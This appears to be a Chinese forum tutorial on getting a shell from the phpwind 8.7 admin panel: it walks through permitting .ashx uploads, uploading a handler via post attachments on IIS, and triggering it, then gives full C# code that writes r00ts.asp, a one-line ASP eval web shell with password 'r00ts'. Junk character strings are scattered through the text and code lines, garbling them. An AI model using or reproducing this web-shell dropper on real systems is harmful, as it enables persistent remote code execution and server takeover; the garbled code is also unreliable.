phpwind 8.7 后台拿shell

admin

首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小

/ P4 V* U* \' A! {% w$ @3 h群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
: Q# U6 q* W, }4 q5 {7 i
! i1 i6 n% X2 a  m% X' J+ o发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整

. P  u% o' Y) \; A然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx

打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
7 R0 w: T8 R% W8 ?, V
! p+ Q2 H! P; X( I, B+ P下面是代码:

& G0 V7 R9 J0 D: y  b* x$ |<%@ WebHandler Language="C#"Class="Handler" %>
using System;
using System.Web;
: ~" @' k4 a- `$ Xusing System.IO;
7 _$ I$ b9 _) F* x3 o) t+ `public class Handler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
: R; u& l5 }* ?8 q2 econtext.Response.ContentType = "text/plain";
; ~3 X9 g4 p8 E. B- }! |% qStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
% P# Q0 {! J: K5 [* {; Gfile1.Write("<%eval request(\"r00ts\")%>");
file1.Flush();
file1.Close();
/ ~' t8 q1 v4 x; M}
1 J0 c8 E) ^3 C! zpublic bool IsReusable {
get {
return false;
}
" K$ H: T2 [" J& M% t# E6 Q: p/ t}
}